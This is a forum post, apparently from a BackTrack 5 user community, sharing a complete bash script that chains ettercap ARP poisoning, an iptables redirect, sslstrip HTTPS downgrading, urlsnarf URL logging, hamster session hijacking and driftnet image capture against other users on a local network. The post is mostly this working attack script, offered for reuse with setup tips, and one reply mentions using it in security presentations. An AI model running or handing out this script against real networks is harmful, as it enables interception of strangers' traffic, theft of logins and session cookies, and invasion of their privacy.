Ettercap + Sslstrip + Hamster + Driftnet + Urlsnarf Script BT5 R1 :-)

[Noobix]

I would like to share my first ever script with you guys. It uses: ettercap, sslstrip, urlsnarf, hamster & driftnet. I’ve tested it on BT5 R1 and it works perfectly.

The script uses ettercap’s GUI to ARP poison, then automates the process of: forwarding ip, configuring iptables, launching sslstrip + tailing sslstrip.log, starts urlsnarf and saves captured url’s in folder you created, launches hamster for session hijacking and runs driftnet to view images.

NOTE: etter.conf - #iptables needs to be #### out (default settings)

When ettercap’s GUI opens ARP poision targets and sniff remote connections but don’t start sniffing! Otherwise it screw’s up sslstrip.

Hope this helps someone out:


#!/bin/bash

# file and path variables
hamsterpath="/pentest/sniffers/hamster" # hamster path

IFACES=`ifconfig | grep ' $' | cut -d " " -f1`

echo -n "What interface to use? ie: "$IFACES":"
read -e IFACE
echo -n "Name of 'Session'? (name of the folder that will be created with all the log files): "
read -e SESSION

mkdir /root/$SESSION/

# ettercap
ettercap -G &
sleep 5

# ip forward
echo "[+] Turning on IP Forwarding..."
echo 1 > /proc/sys/net/ipv4/ip_forward
sleep 1

# iptables
echo "[+] Configuring iptables..."
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080
sleep 1

# sslstrip
echo "[+] Starting sslstrip..."
xterm -geometry 75x15+1+200 -e sslstrip -k -f -l 8080 -w /root/$SESSION/$SESSION.log &
sleep 4

# Tail Sslstrip
echo "[+] Opening sslstrip.log..."
xterm -geometry 75x15+1+200 -e tail -f /root/$SESSION/$SESSION.log &
sleep 2

# urlsnarf
echo
echo "[+] Starting Urlsnarf..."
urlsnarf -i $IFACE | grep http > /root/$SESSION/$SESSION.txt &
sleep 2

# hamster
echo
echo "[+] Starting Hamster..."
xterm -geometry 75x15+1+200 -e $hamsterpath/hamster &
sleep 4

# driftnet
echo "[+] Starting Driftnet..."
driftnet -p -i $IFACE &
sleep 2

echo
echo "************************************************* *******"
echo
echo "[+] Run firefox and type http://hamster"
echo "[+] Don't forget to set proxy to 127.0.0.1:1234"
echo
echo "************************************************* *******"
echo "Press q to quit"
read WISH

# clean up
if [ $WISH = "q" ] ; then
echo
echo "[+] Cleaning up and resetting iptables..."
killall sslstrip
killall ettercap
killall urlsnarf
killall hamster
killall driftnet
killall xterm

echo "0" > /proc/sys/net/ipv4/ip_forward
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain

echo "[+] Clean up successful...L8erz!"
exit

fi
exit

[scottm99]

Thanks for sharing I think this would be especially useful for management presentations on security.